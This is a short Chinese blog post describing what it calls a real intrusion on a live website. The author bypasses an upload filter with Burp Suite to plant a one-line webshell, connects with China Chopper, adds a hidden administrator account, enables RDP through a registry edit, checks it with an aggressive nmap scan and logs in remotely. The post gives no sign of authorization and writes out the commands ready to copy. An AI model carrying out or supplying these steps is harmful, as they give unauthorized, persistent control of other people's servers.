记一次真实渗透经历

本文纯属分享一种实战思维,如有损害利益,请联系小编

背景小编就不多解释了,网络上很多都是关于靶机教程,小编在这里给大家带来一次实战的效果

小编在某站点扫描时,发现其可能存在上传漏洞
记一次真实渗透经历_第1张图片
小编想上传一句话木马,但是发现该站点对文件后缀进行了过滤,故采用burpsuite抓包实现一句话木马文件上传
记一次真实渗透经历_第2张图片
成功上传之后,利用一句话木马进行连接
记一次真实渗透经历_第3张图片
利用菜刀工具的cmd创建用户添加管理员组,打开3389端口允许远程连接。
记一次真实渗透经历_第4张图片
例:

net user test test /add
net localgroup administrators test /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

用nmap扫描查看是否成功开启3389

nmap -T4 -A -sV -Pn -f --min-hostgroup 1024 --min-parallelism 1024 --script=smb-vuln-*.nse IP -p 1-65535

记一次真实渗透经历_第5张图片

利用windows自带的远程工具连接,之后…睡觉吧
记一次真实渗透经历_第6张图片

你可能感兴趣的:(杂记)